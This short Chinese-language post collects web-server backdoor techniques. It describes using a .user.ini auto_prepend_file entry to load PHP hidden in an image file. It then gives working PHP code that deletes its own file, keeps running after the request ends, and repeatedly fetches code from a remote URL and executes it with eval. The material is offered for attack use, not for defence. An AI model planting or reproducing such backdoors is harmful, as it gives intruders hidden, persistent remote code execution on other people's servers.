常用后门方法收集

1、通过php.ini或者user.ini留后门

在一个有正常php文件的目录下新建一个.user.ini

内容为auto_prepend_file=xxx.gif(png/jpg)之类

而你的xxx.gif之类就是你的后门

2、后门的代码第一行删除自身，然后驻留在后台内存里，等待外部链接

<?php
unlink($_SERVER[‘SCRIPT_FILENAME‘]);
ignore_user_abort(true);
set_time_limit(0);
$remote_file = ‘http://xxx/xxx.txt‘;
while($code = file_get_contents($remote_file)){
@eval($code);
sleep(5);
};
?>